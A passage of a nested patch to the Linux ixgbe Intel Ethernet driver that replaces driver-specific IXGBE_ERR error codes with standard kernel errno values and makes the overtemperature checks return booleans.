+ 	u8 databyte = 0xFF;
+ 	int i = 0;
+ 
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 9e0e13638c463..6dc554e810a17 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -2764,7 +2764,6 @@ static void ixgbe_check_overtemp_subtask(struct ixgbe_adapter *adapter)
+ {
+ 	struct ixgbe_hw *hw = &adapter->hw;
+ 	u32 eicr = adapter->interrupt_event;
+-	s32 rc;
+ 
+ 	if (test_bit(__IXGBE_DOWN, &adapter->state))
+ 		return;
+@@ -2798,14 +2797,13 @@ static void ixgbe_check_overtemp_subtask(struct ixgbe_adapter *adapter)
+ 		}
+ 
+ 		/* Check if this is not due to overtemp */
+-		if (hw->phy.ops.check_overtemp(hw) != IXGBE_ERR_OVERTEMP)
++		if (!hw->phy.ops.check_overtemp(hw))
+ 			return;
+ 
+ 		break;
+ 	case IXGBE_DEV_ID_X550EM_A_1G_T:
+ 	case IXGBE_DEV_ID_X550EM_A_1G_T_L:
+-		rc = hw->phy.ops.check_overtemp(hw);
+-		if (rc != IXGBE_ERR_OVERTEMP)
++		if (!hw->phy.ops.check_overtemp(hw))
+ 			return;
+ 		break;
+ 	default:
+@@ -5520,7 +5518,7 @@ static int ixgbe_non_sfp_link_config(struct ixgbe_hw *hw)
+ {
+ 	u32 speed;
+ 	bool autoneg, link_up = false;
+-	int ret = IXGBE_ERR_LINK_SETUP;
++	int ret = -EIO;
+ 
+ 	if (hw->mac.ops.check_link)
+ 		ret = hw->mac.ops.check_link(hw, &speed, &link_up, false);
+@@ -5991,13 +5989,13 @@ void ixgbe_reset(struct ixgbe_adapter *adapter)
+ 	err = hw->mac.ops.init_hw(hw);
+ 	switch (err) {
+ 	case 0:
+-	case IXGBE_ERR_SFP_NOT_PRESENT:
+-	case IXGBE_ERR_SFP_NOT_SUPPORTED:
++	case -ENOENT:
++	case -EOPNOTSUPP:
+ 		break;
+-	case IXGBE_ERR_PRIMARY_REQUESTS_PENDING:
++	case -EALREADY:
+ 		e_dev_err("primary disable timed out\n");
+ 		break;
+-	case IXGBE_ERR_EEPROM_VERSION:
++	case -EACCES:
+ 		/* We are running on a pre-production device, log a warning */
+ 		e_dev_warn("This device is a pre-production adapter/LOM. "
+ 			   "Please be aware there may be issues associated with "
+@@ -7837,10 +7835,10 @@ static void ixgbe_sfp_detection_subtask(struct ixgbe_adapter *adapter)
+ 	adapter->sfp_poll_time = jiffies + IXGBE_SFP_POLL_JIFFIES - 1;
+ 
+ 	err = hw->phy.ops.identify_sfp(hw);
+-	if (err == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (err == -EOPNOTSUPP)
+ 		goto sfp_out;
+ 
+-	if (err == IXGBE_ERR_SFP_NOT_PRESENT) {
++	if (err == -ENOENT) {
+ 		/* If no cable is present, then we need to reset
+ 		 * the next time we find a good cable. */
+ 		adapter->flags2 |= IXGBE_FLAG2_SFP_NEEDS_RESET;
+@@ -7866,7 +7864,7 @@ static void ixgbe_sfp_detection_subtask(struct ixgbe_adapter *adapter)
+ 	else
+ 		err = hw->mac.ops.setup_sfp(hw);
+ 
+-	if (err == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (err == -EOPNOTSUPP)
+ 		goto sfp_out;
+ 
+ 	adapter->flags |= IXGBE_FLAG_NEED_LINK_CONFIG;
+@@ -7875,8 +7873,8 @@ static void ixgbe_sfp_detection_subtask(struct ixgbe_adapter *adapter)
+ sfp_out:
+ 	clear_bit(__IXGBE_IN_SFP_INIT, &adapter->state);
+ 
+-	if ((err == IXGBE_ERR_SFP_NOT_SUPPORTED) &&
+-	    (adapter->netdev->reg_state == NETREG_REGISTERED)) {
++	if (err == -EOPNOTSUPP &&
++	    adapter->netdev->reg_state == NETREG_REGISTERED) {
+ 		e_dev_err("failed to initialize because an unsupported "
+ 			  "SFP+ module type was detected.\n");
+ 		e_dev_err("Reload the driver after installing a "
+@@ -7946,7 +7944,7 @@ static void ixgbe_service_timer(struct timer_list *t)
+ static void ixgbe_phy_interrupt_subtask(struct ixgbe_adapter *adapter)
+ {
+ 	struct ixgbe_hw *hw = &adapter->hw;
+-	u32 status;
++	bool overtemp;
+ 
+ 	if (!(adapter->flags2 & IXGBE_FLAG2_PHY_INTERRUPT))
+ 		return;
+@@ -7956,11 +7954,9 @@ static void ixgbe_phy_interrupt_subtask(struct ixgbe_adapter *adapter)
+ 	if (!hw->phy.ops.handle_lasi)
+ 		return;
+ 
+-	status = hw->phy.ops.handle_lasi(&adapter->hw);
+-	if (status != IXGBE_ERR_OVERTEMP)
+-		return;
+-
+-	e_crit(drv, "%s\n", ixgbe_overheat_msg);
++	hw->phy.ops.handle_lasi(&adapter->hw, &overtemp);
++	if (overtemp)
++		e_crit(drv, "%s\n", ixgbe_overheat_msg);
+ }
+ 
+ static void ixgbe_reset_subtask(struct ixgbe_adapter *adapter)
+@@ -10943,9 +10939,9 @@ static int ixgbe_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	err = hw->mac.ops.reset_hw(hw);
+ 	hw->phy.reset_if_overtemp = false;
+ 	ixgbe_set_eee_capable(adapter);
+-	if (err == IXGBE_ERR_SFP_NOT_PRESENT) {
++	if (err == -ENOENT) {
+ 		err = 0;
+-	} else if (err == IXGBE_ERR_SFP_NOT_SUPPORTED) {
++	} else if (err == -EOPNOTSUPP) {
+ 		e_dev_err("failed to load because an unsupported SFP+ or QSFP module type was detected.\n");
+ 		e_dev_err("Reload the driver after installing a supported module.\n");
+ 		goto err_sw_init;
+@@ -11161,7 +11157,7 @@ skip_sriov:
+ 
+ 	/* reset the hardware with the new settings */
+ 	err = hw->mac.ops.start_hw(hw);
+-	if (err == IXGBE_ERR_EEPROM_VERSION) {
++	if (err == -EACCES) {
+ 		/* We are running on a pre-production device, log a warning */
+ 		e_dev_warn("This device is a pre-production adapter/LOM. "
+ 			   "Please be aware there may be issues associated "
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.c
+index 5679293e53f7a..fe7ef5773369a 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.c
+@@ -24,7 +24,7 @@ s32 ixgbe_read_mbx(struct ixgbe_hw *hw, u32 *msg, u16 size, u16 mbx_id)
+ 		size = mbx->size;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->read(hw, msg, size, mbx_id);
+ }
+@@ -43,10 +43,10 @@ s32 ixgbe_write_mbx(struct ixgbe_hw *hw, u32 *msg, u16 size, u16 mbx_id)
+ 	struct ixgbe_mbx_info *mbx = &hw->mbx;
+ 
+ 	if (size > mbx->size)
+-		return IXGBE_ERR_MBX;
++		return -EINVAL;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->write(hw, msg, size, mbx_id);
+ }
+@@ -63,7 +63,7 @@ s32 ixgbe_check_for_msg(struct ixgbe_hw *hw, u16 mbx_id)
+ 	struct ixgbe_mbx_info *mbx = &hw->mbx;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->check_for_msg(hw, mbx_id);
+ }
+@@ -80,7 +80,7 @@ s32 ixgbe_check_for_ack(struct ixgbe_hw *hw, u16 mbx_id)
+ 	struct ixgbe_mbx_info *mbx = &hw->mbx;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->check_for_ack(hw, mbx_id);
+ }
+@@ -97,7 +97,7 @@ s32 ixgbe_check_for_rst(struct ixgbe_hw *hw, u16 mbx_id)
+ 	struct ixgbe_mbx_info *mbx = &hw->mbx;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->check_for_rst(hw, mbx_id);
+ }
+@@ -115,12 +115,12 @@ static s32 ixgbe_poll_for_msg(struct ixgbe_hw *hw, u16 mbx_id)
+ 	int countdown = mbx->timeout;
+ 
+ 	if (!countdown || !mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	while (mbx->ops->check_for_msg(hw, mbx_id)) {
+ 		countdown--;
+ 		if (!countdown)
+-			return IXGBE_ERR_MBX;
++			return -EIO;
+ 		udelay(mbx->usec_delay);
+ 	}
+ 
+@@ -140,12 +140,12 @@ static s32 ixgbe_poll_for_ack(struct ixgbe_hw *hw, u16 mbx_id)
+ 	int countdown = mbx->timeout;
+ 
+ 	if (!countdown || !mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	while (mbx->ops->check_for_ack(hw, mbx_id)) {
+ 		countdown--;
+ 		if (!countdown)
+-			return IXGBE_ERR_MBX;
++			return -EIO;
+ 		udelay(mbx->usec_delay);
+ 	}
+ 
+@@ -169,7 +169,7 @@ static s32 ixgbe_read_posted_mbx(struct ixgbe_hw *hw, u32 *msg, u16 size,
+ 	s32 ret_val;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	ret_val = ixgbe_poll_for_msg(hw, mbx_id);
+ 	if (ret_val)
+@@ -197,7 +197,7 @@ static s32 ixgbe_write_posted_mbx(struct ixgbe_hw *hw, u32 *msg, u16 size,
+ 
+ 	/* exit if either we can't write or there isn't a defined timeout */
+ 	if (!mbx->ops || !mbx->timeout)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	/* send msg */
+ 	ret_val = mbx->ops->write(hw, msg, size, mbx_id);
+@@ -217,7 +217,7 @@ static s32 ixgbe_check_for_bit_pf(struct ixgbe_hw *hw, u32 mask, s32 index)
+ 		return 0;
+ 	}
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+@@ -238,7 +238,7 @@ static s32 ixgbe_check_for_msg_pf(struct ixgbe_hw *hw, u16 vf_number)
+ 		return 0;
+ 	}
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+@@ -259,7 +259,7 @@ static s32 ixgbe_check_for_ack_pf(struct ixgbe_hw *hw, u16 vf_number)
+ 		return 0;
+ 	}
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+@@ -295,7 +295,7 @@ static s32 ixgbe_check_for_rst_pf(struct ixgbe_hw *hw, u16 vf_number)
+ 		return 0;
+ 	}
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+@@ -317,7 +317,7 @@ static s32 ixgbe_obtain_mbx_lock_pf(struct ixgbe_hw *hw, u16 vf_number)
+ 	if (p2v_mailbox & IXGBE_PFMAILBOX_PFU)
+ 		return 0;
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.h b/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.h
+index 8f4316b19278c..6434c190e7a4c 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.h
+@@ -7,7 +7,6 @@
+ #include "ixgbe_type.h"
+ 
+ #define IXGBE_VFMAILBOX_SIZE        16 /* 16 32 bit words - 64 bytes */
+-#define IXGBE_ERR_MBX               -100
+ 
+ #define IXGBE_VFMAILBOX             0x002FC
+ #define IXGBE_VFMBMEM               0x00200
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
+index 123dca9ce4683..305afb82388b7 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
+@@ -102,7 +102,7 @@ s32 ixgbe_read_i2c_combined_generic_int(struct ixgbe_hw *hw, u8 addr,
+ 	csum = ~csum;
+ 	do {
+ 		if (lock && hw->mac.ops.acquire_swfw_sync(hw, swfw_mask))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 		ixgbe_i2c_start(hw);
+ 		/* Device Address and write indication */
+ 		if (ixgbe_out_i2c_byte_ack(hw, addr))
+@@ -150,7 +150,7 @@ fail:
+ 			hw_dbg(hw, "I2C byte read combined error.\n");
+ 	} while (retry < max_retry);
+ 
+-	return IXGBE_ERR_I2C;
++	return -EIO;
+ }
+ 
+ /**
+@@ -179,7 +179,7 @@ s32 ixgbe_write_i2c_combined_generic_int(struct ixgbe_hw *hw, u8 addr,
+ 	csum = ~csum;
+ 	do {
+ 		if (lock && hw->mac.ops.acquire_swfw_sync(hw, swfw_mask))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 		ixgbe_i2c_start(hw);
+ 		/* Device Address and write indication */
+ 		if (ixgbe_out_i2c_byte_ack(hw, addr))
+@@ -215,7 +215,7 @@ fail:
+ 			hw_dbg(hw, "I2C byte write combined error.\n");
+ 	} while (retry < max_retry);
+ 
+-	return IXGBE_ERR_I2C;
++	return -EIO;
+ }
+ 
+ /**
+@@ -262,8 +262,8 @@ static bool ixgbe_probe_phy(struct ixgbe_hw *hw, u16 phy_addr)
+  **/
+ s32 ixgbe_identify_phy_generic(struct ixgbe_hw *hw)
+ {
++	u32 status = -EFAULT;
+ 	u32 phy_addr;
+-	u32 status = IXGBE_ERR_PHY_ADDR_INVALID;
+ 
+ 	if (!hw->phy.phy_semaphore_mask) {
+ 		if (hw->bus.lan_id)
+@@ -282,7 +282,7 @@ s32 ixgbe_identify_phy_generic(struct ixgbe_hw *hw)
+ 		if (ixgbe_probe_phy(hw, phy_addr))
+ 			return 0;
+ 		else
+-			return IXGBE_ERR_PHY_ADDR_INVALID;
++			return -EFAULT;
+ 	}
+ 
+ 	for (phy_addr = 0; phy_addr < IXGBE_MAX_PHY_ADDR; phy_addr++) {
+@@ -408,8 +408,7 @@ s32 ixgbe_reset_phy_generic(struct ixgbe_hw *hw)
+ 		return status;
+ 
+ 	/* Don't reset PHY if it's shut down due to overtemp. */
+-	if (!hw->phy.reset_if_overtemp &&
+-	    (IXGBE_ERR_OVERTEMP == hw->phy.ops.check_overtemp(hw)))
++	if (!hw->phy.reset_if_overtemp && hw->phy.ops.check_overtemp(hw))
+ 		return 0;
+ 
+ 	/* Blocked by MNG FW so bail */
+@@ -457,7 +456,7 @@ s32 ixgbe_reset_phy_generic(struct ixgbe_hw *hw)
+ 
+ 	if (ctrl & MDIO_CTRL1_RESET) {
+ 		hw_dbg(hw, "PHY reset polling failed to complete.\n");
+-		return IXGBE_ERR_RESET_FAILED;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -500,7 +499,7 @@ s32 ixgbe_read_phy_reg_mdi(struct ixgbe_hw *hw, u32 reg_addr, u32 device_type,
+ 
+ 	if ((command & IXGBE_MSCA_MDI_COMMAND) != 0) {
+ 		hw_dbg(hw, "PHY address command did not complete.\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	/* Address cycle complete, setup and write the read
+@@ -527,7 +526,7 @@ s32 ixgbe_read_phy_reg_mdi(struct ixgbe_hw *hw, u32 reg_addr, u32 device_type,
+ 
+ 	if ((command & IXGBE_MSCA_MDI_COMMAND) != 0) {
+ 		hw_dbg(hw, "PHY read command didn't complete\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	/* Read operation is complete.  Get the data
+@@ -559,7 +558,7 @@ s32 ixgbe_read_phy_reg_generic(struct ixgbe_hw *hw, u32 reg_addr,
+ 						phy_data);
+ 		hw->mac.ops.release_swfw_sync(hw, gssr);
+ 	} else {
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 
+ 	return status;
+@@ -604,7 +603,7 @@ s32 ixgbe_write_phy_reg_mdi(struct ixgbe_hw *hw, u32 reg_addr,
+ 
+ 	if ((command & IXGBE_MSCA_MDI_COMMAND) != 0) {
+ 		hw_dbg(hw, "PHY address cmd didn't complete\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	/*
+@@ -632,7 +631,7 @@ s32 ixgbe_write_phy_reg_mdi(struct ixgbe_hw *hw, u32 reg_addr,
+ 
+ 	if ((command & IXGBE_MSCA_MDI_COMMAND) != 0) {
+ 		hw_dbg(hw, "PHY write cmd didn't complete\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -657,7 +656,7 @@ s32 ixgbe_write_phy_reg_generic(struct ixgbe_hw *hw, u32 reg_addr,
+ 						 phy_data);
+ 		hw->mac.ops.release_swfw_sync(hw, gssr);
+ 	} else {
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 
+ 	return status;
+@@ -1303,7 +1302,7 @@ s32 ixgbe_reset_phy_nl(struct ixgbe_hw *hw)
+ 
+ 	if ((phy_data & MDIO_CTRL1_RESET) != 0) {
+ 		hw_dbg(hw, "PHY reset did not complete.\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	/* Get init offsets */
+@@ -1360,12 +1359,12 @@ s32 ixgbe_reset_phy_nl(struct ixgbe_hw *hw)
+ 				hw_dbg(hw, "SOL\n");
+ 			} else {
+ 				hw_dbg(hw, "Bad control value\n");
+-				return IXGBE_ERR_PHY;
++				return -EIO;
+ 			}
+ 			break;
+ 		default:
+ 			hw_dbg(hw, "Bad control type\n");
+-			return IXGBE_ERR_PHY;
++			return -EIO;
+ 		}
+ 	}
+ 
+@@ -1373,7 +1372,7 @@ s32 ixgbe_reset_phy_nl(struct ixgbe_hw *hw)
+ 
+ err_eeprom:
+ 	hw_err(hw, "eeprom read at offset %d failed\n", data_offset);
+-	return IXGBE_ERR_PHY;
++	return -EIO;
+ }
+ 
+ /**
+@@ -1391,10 +1390,10 @@ s32 ixgbe_identify_module_generic(struct ixgbe_hw *hw)
+ 		return ixgbe_identify_qsfp_module_generic(hw);
+ 	default:
+ 		hw->phy.sfp_type = ixgbe_sfp_type_not_present;
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 	}
+ 
+-	return IXGBE_ERR_SFP_NOT_PRESENT;
++	return -ENOENT;
+ }
+ 
+ /**
+@@ -1419,7 +1418,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw)
+ 
+ 	if (hw->mac.ops.get_media_type(hw) != ixgbe_media_type_fiber) {
+ 		hw->phy.sfp_type = ixgbe_sfp_type_not_present;
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 	}
+ 
+ 	/* LAN ID is needed for sfp_type determination */
+@@ -1434,7 +1433,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw)
+ 
+ 	if (identifier != IXGBE_SFF_IDENTIFIER_SFP) {
+ 		hw->phy.type = ixgbe_phy_sfp_unsupported;
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 	status = hw->phy.ops.read_i2c_eeprom(hw,
+ 					     IXGBE_SFF_1GBE_COMP_CODES,
+@@ -1625,7 +1624,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw)
+ 	      hw->phy.sfp_type == ixgbe_sfp_type_1g_sx_core0 ||
+ 	      hw->phy.sfp_type == ixgbe_sfp_type_1g_sx_core1)) {
+ 		hw->phy.type = ixgbe_phy_sfp_unsupported;
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	/* Anything else 82598-based is supported */
+@@ -1649,7 +1648,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw)
+ 		}
+ 		hw_dbg(hw, "SFP+ module not supported\n");
+ 		hw->phy.type = ixgbe_phy_sfp_unsupported;
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 	return 0;
+ 
+@@ -1659,7 +1658,7 @@ err_read_i2c_eeprom:
+ 		hw->phy.id = 0;
+ 		hw->phy.type = ixgbe_phy_unknown;
+ 	}
+-	return IXGBE_ERR_SFP_NOT_PRESENT;
++	return -ENOENT;
+ }
+ 
+ /**
+@@ -1686,7 +1685,7 @@ static s32 ixgbe_identify_qsfp_module_generic(struct ixgbe_hw *hw)
+ 
+ 	if (hw->mac.ops.get_media_type(hw) != ixgbe_media_type_fiber_qsfp) {
+ 		hw->phy.sfp_type = ixgbe_sfp_type_not_present;
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 	}
+ 
+ 	/* LAN ID is needed for sfp_type determination */
+@@ -1700,7 +1699,7 @@ static s32 ixgbe_identify_qsfp_module_generic(struct ixgbe_hw *hw)
+ 
+ 	if (identifier != IXGBE_SFF_IDENTIFIER_QSFP_PLUS) {
+ 		hw->phy.type = ixgbe_phy_sfp_unsupported;
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	hw->phy.id = identifier;
+@@ -1768,7 +1767,7 @@ static s32 ixgbe_identify_qsfp_module_generic(struct ixgbe_hw *hw)
+ 		} else {
+ 			/* unsupported module type */
+ 			hw->phy.type = ixgbe_phy_sfp_unsupported;
+-			return IXGBE_ERR_SFP_NOT_SUPPORTED;
++			return -EOPNOTSUPP;
+ 		}
+ 	}
+ 
+@@ -1828,7 +1827,7 @@ static s32 ixgbe_identify_qsfp_module_generic(struct ixgbe_hw *hw)
+ 			}
+ 			hw_dbg(hw, "QSFP module not supported\n");
+ 			hw->phy.type = ixgbe_phy_sfp_unsupported;
+-			return IXGBE_ERR_SFP_NOT_SUPPORTED;
++			return -EOPNOTSUPP;
+ 		}
+ 		return 0;
+ 	}
+@@ -1839,7 +1838,7 @@ err_read_i2c_eeprom:
+ 	hw->phy.id = 0;
+ 	hw->phy.type = ixgbe_phy_unknown;
+ 
+-	return IXGBE_ERR_SFP_NOT_PRESENT;
++	return -ENOENT;
+ }
+ 
+ /**
+@@ -1859,14 +1858,14 @@ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 	u16 sfp_type = hw->phy.sfp_type;
+ 
+ 	if (hw->phy.sfp_type == ixgbe_sfp_type_unknown)
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 
+ 	if (hw->phy.sfp_type == ixgbe_sfp_type_not_present)
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 
+ 	if ((hw->device_id == IXGBE_DEV_ID_82598_SR_DUAL_PORT_EM) &&
+ 	    (hw->phy.sfp_type == ixgbe_sfp_type_da_cu))
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 
+ 	/*
+ 	 * Limiting active cables and 1G Phys must be initialized as
+@@ -1887,11 +1886,11 @@ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 	if (hw->eeprom.ops.read(hw, IXGBE_PHY_INIT_OFFSET_NL, list_offset)) {
+ 		hw_err(hw, "eeprom read at %d failed\n",
+ 		       IXGBE_PHY_INIT_OFFSET_NL);
+-		return IXGBE_ERR_SFP_NO_INIT_SEQ_PRESENT;
++		return -EIO;
+ 	}
+ 
+ 	if ((!*list_offset) || (*list_offset == 0xFFFF))
+-		return IXGBE_ERR_SFP_NO_INIT_SEQ_PRESENT;
++		return -EIO;
+ 
+ 	/* Shift offset to first ID word */
+ 	(*list_offset)++;
+@@ -1910,7 +1909,7 @@ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 				goto err_phy;
+ 			if ((!*data_offset) || (*data_offset == 0xFFFF)) {
+ 				hw_dbg(hw, "SFP+ module not supported\n");
+-				return IXGBE_ERR_SFP_NOT_SUPPORTED;
++				return -EOPNOTSUPP;
+ 			} else {
+ 				break;
+ 			}
+@@ -1923,14 +1922,14 @@ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 
+ 	if (sfp_id == IXGBE_PHY_INIT_END_NL) {
+ 		hw_dbg(hw, "No matching SFP+ module found\n");
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	return 0;
+ 
+ err_phy:
+ 	hw_err(hw, "eeprom read at offset %d failed\n", *list_offset);
+-	return IXGBE_ERR_PHY;
++	return -EIO;
+ }
+ 
+ /**
+@@ -2025,7 +2024,7 @@ static s32 ixgbe_read_i2c_byte_generic_int(struct ixgbe_hw *hw, u8 byte_offset,
+ 
+ 	do {
+ 		if (lock && hw->mac.ops.acquire_swfw_sync(hw, swfw_mask))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		ixgbe_i2c_start(hw);
+ 
+@@ -2141,7 +2140,7 @@ static s32 ixgbe_write_i2c_byte_generic_int(struct ixgbe_hw *hw, u8 byte_offset,
+ 	u32 swfw_mask = hw->phy.phy_semaphore_mask;
+ 
+ 	if (lock && hw->mac.ops.acquire_swfw_sync(hw, swfw_mask))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	do {
+ 		ixgbe_i2c_start(hw);
+@@ -2383,7 +2382,7 @@ static s32 ixgbe_get_i2c_ack(struct ixgbe_hw *hw)
+ 
+ 	if (ack == 1) {
+ 		hw_dbg(hw, "I2C ack was not received.\n");
+-		status = IXGBE_ERR_I2C;
++		status = -EIO;
+ 	}
+ 
+ 	ixgbe_lower_i2c_clk(hw, &i2cctl);
+@@ -2455,7 +2454,7 @@ static s32 ixgbe_clock_out_i2c_bit(struct ixgbe_hw *hw, bool data)
+ 		udelay(IXGBE_I2C_T_LOW);
+ 	} else {
+ 		hw_dbg(hw, "I2C data was not set to %X\n", data);
+-		return IXGBE_ERR_I2C;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -2551,7 +2550,7 @@ static s32 ixgbe_set_i2c_data(struct ixgbe_hw *hw, u32 *i2cctl, bool data)
+ 	*i2cctl = IXGBE_READ_REG(hw, IXGBE_I2CCTL(hw));
+ 	if (data != ixgbe_get_i2c_data(hw, i2cctl)) {
+ 		hw_dbg(hw, "Error - I2C data was not set to %X.\n", data);
+-		return IXGBE_ERR_I2C;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -2621,22 +2620,24 @@ static void ixgbe_i2c_bus_clear(struct ixgbe_hw *hw)
+  *  @hw: pointer to hardware structure
+  *
+  *  Checks if the LASI temp alarm status was triggered due to overtemp
++ *
++ *  Return true when an overtemp event is detected, otherwise false.
+  **/
+-s32 ixgbe_tn_check_overtemp(struct ixgbe_hw *hw)
++bool ixgbe_tn_check_overtemp(struct ixgbe_hw *hw)
+ {
+ 	u16 phy_data = 0;
++	u32 status;
+ 
+ 	if (hw->device_id != IXGBE_DEV_ID_82599_T3_LOM)
+-		return 0;
++		return false;
+ 
+ 	/* Check that the LASI temp alarm status was triggered */
+-	hw->phy.ops.read_reg(hw, IXGBE_TN_LASI_STATUS_REG,
+-			     MDIO_MMD_PMAPMD, &phy_data);
+-
+-	if (!(phy_data & IXGBE_TN_LASI_STATUS_TEMP_ALARM))
+-		return 0;
++	status = hw->phy.ops.read_reg(hw, IXGBE_TN_LASI_STATUS_REG,
++				      MDIO_MMD_PMAPMD, &phy_data);
++	if (status)
++		return false;
+ 
+-	return IXGBE_ERR_OVERTEMP;
++	return !!(phy_data & IXGBE_TN_LASI_STATUS_TEMP_ALARM);
+ }
+ 
+ /** ixgbe_set_copper_phy_power - Control power for copper phy
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.h b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.h
+index 6544c4539c0de..ef72729d7c933 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.h
+@@ -155,7 +155,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw);
+ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 					u16 *list_offset,
+ 					u16 *data_offset);
+-s32 ixgbe_tn_check_overtemp(struct ixgbe_hw *hw);
++bool ixgbe_tn_check_overtemp(struct ixgbe_hw *hw);
+ s32 ixgbe_read_i2c_byte_generic(struct ixgbe_hw *hw, u8 byte_offset,
+ 				u8 dev_addr, u8 *data);
+ s32 ixgbe_read_i2c_byte_generic_unlocked(struct ixgbe_hw *hw, u8 byte_offset,
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
+index ea88ac04ab9ad..198ab9d97618c 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
+@@ -1329,7 +1329,7 @@ static int ixgbe_rcv_msg_from_vf(struct ixgbe_adapter *adapter, u32 vf)
+ 		break;
+ 	default:
+ 		e_err(drv, "Unhandled Msg %8.8x\n", msgbuf[0]);
+-		retval = IXGBE_ERR_MBX;
++		retval = -EIO;
+ 		break;
+ 	}
+ 
